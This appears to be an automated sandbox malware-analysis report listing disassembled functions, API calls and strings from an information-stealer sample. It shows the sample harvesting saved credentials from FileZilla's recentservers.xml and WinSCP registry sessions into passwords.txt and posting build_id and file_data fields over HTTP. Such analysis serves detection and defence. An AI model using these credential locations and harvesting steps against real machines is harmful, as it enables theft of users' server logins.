Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91

StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,e90840a846d017e7b095f7543cdf2d15,",build_id,00437814,------), ref: 00405C67
lstrlenA.KERNEL32(?), ref: 00405C7A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
HeapAlloc.KERNEL32(00000000), ref: 00405C99
lstrlenA.KERNEL32(?), ref: 00405CA6
_memmove.LIBCMT ref: 00405CB4
lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
_memmove.LIBCMT ref: 00405CD6
lstrlenA.KERNEL32(?), ref: 00405CE4
lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
_memmove.LIBCMT ref: 00405D05
lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
ExitProcess.KERNEL32 ref: 00405E46

Strings

ERROR, xrefs: 00405F2F
file_data, xrefs: 00405C09
------, xrefs: 00405605
------, xrefs: 0040589D
build_id, xrefs: 0040594F
e90840a846d017e7b095f7543cdf2d15, xrefs: 004059A7
------, xrefs: 0040573C
------, xrefs: 004059FF
ERROR, xrefs: 00405D79
block, xrefs: 00405E30
", xrefs: 0040581B
", xrefs: 00405AD8
", xrefs: 00405C35
", xrefs: 0040597B
--, xrefs: 00405600
------, xrefs: 00405B5D

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$block$build_id$e90840a846d017e7b095f7543cdf2d15$file_data
API String ID: 2638065154-3688182045
Opcode ID: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
Instruction ID: a1f310b16752a75a1e3861b17425502ee47d614580a36b5f1e1f8e1f13a41955
Opcode Fuzzy Hash: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
Instruction Fuzzy Hash: 3742E671D401699BDF21FB21DC45ACDB3B9BF04308F0085E6A548B3152DAB86FCA9F98

Function 0040E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

strtok_s.MSVCRT ref: 0040E77E
GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
lstrlenA.KERNEL32(00000000), ref: 0040E7EA
StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
lstrlenA.KERNEL32(00000000), ref: 0040E829
StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
lstrlenA.KERNEL32(00000000), ref: 0040E862
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
lstrlenA.KERNEL32(00000000), ref: 0040E89B
lstrlenA.KERNEL32(?), ref: 0040E901
lstrlenA.KERNEL32(?), ref: 0040E915
lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

Login: , xrefs: 0040E98C
Password: , xrefs: 0040E9AE
Soft: FileZilla, xrefs: 0040E948
Host: , xrefs: 0040E954
<Port>, xrefs: 0040E818
<User>, xrefs: 0040E851
passwords.txt, xrefs: 0040EA4D
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040E71F
<Pass encoding="base64">, xrefs: 0040E88A
<Host>, xrefs: 0040E7D9

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 4146028692-935134978
Opcode ID: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
Instruction ID: 2e9f852a615408e756f1d7d3730d5668bfc6bf7d6dc94c0724fe4efb67adb4f0
Opcode Fuzzy Hash: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
Instruction Fuzzy Hash: 6FA17572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99

Function 00406BB5 Relevance: 63.6, APIs: 20, Strings: 16, Instructions: 598
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406C54
StrCmpCA.SHLWAPI(?), ref: 00406C72
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0A
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00406E4E
lstrlenA.KERNEL32(?,",status,00437998,------,0043798C,",task_id,00437978,------,0043796C,",mode,00437958,------,0043794C), ref: 0040753C
lstrlenA.KERNEL32(?), ref: 0040754B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407556
HeapAlloc.KERNEL32(00000000), ref: 0040755D
lstrlenA.KERNEL32(?), ref: 0040756A
_memmove.LIBCMT ref: 00407578
lstrlenA.KERNEL32(?), ref: 00407586
lstrlenA.KERNEL32(?,?,00000000), ref: 00407594
_memmove.LIBCMT ref: 004075A1
lstrlenA.KERNEL32(?,?,00000000), ref: 004075B6
HttpSendRequestA.WININET(00000000,?,00000000), ref: 004075C4
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00407621
InternetCloseHandle.WININET(00000000), ref: 0040762C
InternetCloseHandle.WININET(?), ref: 00407638
InternetCloseHandle.WININET(?), ref: 00407644
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406E7C

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

", xrefs: 004070C1
------, xrefs: 00407145
------, xrefs: 00406FE3
------, xrefs: 00406CFC
build_id, xrefs: 00407095
", xrefs: 0040737D
task_id, xrefs: 00407351
e90840a846d017e7b095f7543cdf2d15, xrefs: 004070ED
", xrefs: 004074DD
", xrefs: 0040721D
------, xrefs: 004073FF
mode, xrefs: 004071F1
------, xrefs: 00406E82
status, xrefs: 004074B1
", xrefs: 00406F61
------, xrefs: 0040729F

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$"$"$------$------$------$------$------$------$build_id$e90840a846d017e7b095f7543cdf2d15$mode$status$task_id
API String ID: 3702379033-1263117375
Opcode ID: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
Instruction ID: f28151e3697947f206a0980c25f575650e410a772d733d80a29dba40e216d304
Opcode Fuzzy Hash: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
Instruction Fuzzy Hash: 7552897194016D9ACF61EB62CD46BCCB3B5AF04308F4184E7A51D73161DA746FCA8FA8

Function 00405F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
StrCmpCA.SHLWAPI(?), ref: 00405FF6
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,e90840a846d017e7b095f7543cdf2d15,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
lstrlenA.KERNEL32(?), ref: 0040660C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
HeapAlloc.KERNEL32(00000000), ref: 0040661E
lstrlenA.KERNEL32(?), ref: 0040662B
_memmove.LIBCMT ref: 00406639
lstrlenA.KERNEL32(?), ref: 00406647
lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
_memmove.LIBCMT ref: 00406662
lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
InternetCloseHandle.WININET(00000000), ref: 004066ED
InternetCloseHandle.WININET(?), ref: 004066F9
InternetCloseHandle.WININET(?), ref: 00406705
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

", xrefs: 004065A1
mode, xrefs: 00406575
", xrefs: 004062E5
", xrefs: 00406445
------, xrefs: 00406080
e90840a846d017e7b095f7543cdf2d15, xrefs: 00406471
------, xrefs: 004064C9
------, xrefs: 00406206
build_id, xrefs: 00406419
------, xrefs: 00406367

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$------$------$------$------$build_id$e90840a846d017e7b095f7543cdf2d15$mode
API String ID: 3702379033-4195047346
Opcode ID: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
Instruction ID: 82dd920f4857eb4424cccb8e833476094bcda5e32b3baf042c939ae059a0737f
Opcode Fuzzy Hash: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
Instruction Fuzzy Hash: FF22B9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8

Function 0040E186 Relevance: 51.1, APIs: 15, Strings: 14, Instructions: 325
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040E1B7
_memset.LIBCMT ref: 0040E1D7
_memset.LIBCMT ref: 0040E1E8
_memset.LIBCMT ref: 0040E1F9
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9

Strings

HostName, xrefs: 0040E367
UserName, xrefs: 0040E496
Password, xrefs: 0040E515
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040E20B
:22, xrefs: 0040E42D
Host: , xrefs: 0040E32A
Soft: WinSCP, xrefs: 0040E2FE
Login: , xrefs: 0040E459
PortNumber, xrefs: 0040E3BD
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040E2B3
passwords.txt, xrefs: 0040E662
Security, xrefs: 0040E253
UseMasterPassword, xrefs: 0040E24E
Password: , xrefs: 0040E529

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$Value$Open$Enum
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 3303087153-2798830873
Opcode ID: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
Instruction ID: 1c66541d4828bd9326f921050ea70c7b79589cb9660c5b8585550bf775721ac0
Opcode Fuzzy Hash: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
Instruction Fuzzy Hash: B5D1D6B295012DAADF20EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5

Function 00418643 Relevance: 48.2, APIs: 32, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00418684
GetProcAddress.KERNEL32 ref: 0041869B
GetProcAddress.KERNEL32 ref: 004186B2
GetProcAddress.KERNEL32 ref: 004186C9
GetProcAddress.KERNEL32 ref: 004186E0
GetProcAddress.KERNEL32 ref: 004186F7
GetProcAddress.KERNEL32 ref: 0041870E
GetProcAddress.KERNEL32 ref: 00418725
GetProcAddress.KERNEL32 ref: 0041873C
GetProcAddress.KERNEL32 ref: 00418753
GetProcAddress.KERNEL32 ref: 0041876A
GetProcAddress.KERNEL32 ref: 00418781
GetProcAddress.KERNEL32 ref: 00418798
GetProcAddress.KERNEL32 ref: 004187AF
GetProcAddress.KERNEL32 ref: 004187C6
GetProcAddress.KERNEL32 ref: 004187DD
GetProcAddress.KERNEL32 ref: 004187F4
GetProcAddress.KERNEL32 ref: 0041880B
GetProcAddress.KERNEL32 ref: 00418822
GetProcAddress.KERNEL32 ref: 00418839
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041884A
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041885B
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041886C
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041888E
GetProcAddress.KERNEL32(75A70000,004184C2), ref: 004188AA
GetProcAddress.KERNEL32(75290000,004184C2), ref: 004188C5
GetProcAddress.KERNEL32 ref: 004188DC
GetProcAddress.KERNEL32(75BD0000,004184C2), ref: 004188F7
GetProcAddress.KERNEL32(75450000,004184C2), ref: 00418912
GetProcAddress.KERNEL32(76E90000,004184C2), ref: 0041892D
GetProcAddress.KERNEL32 ref: 00418944

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
Instruction ID: 2c76b628124a1797fdce28c748a09696ce6250a2eaa67b4899ff399dadce2328
Opcode Fuzzy Hash: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
Instruction Fuzzy Hash: 96711675910312AFEF1ADF60FD088243BA7F70874BF10A426E91582270EB374A64EF55

Function 00413B86 Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

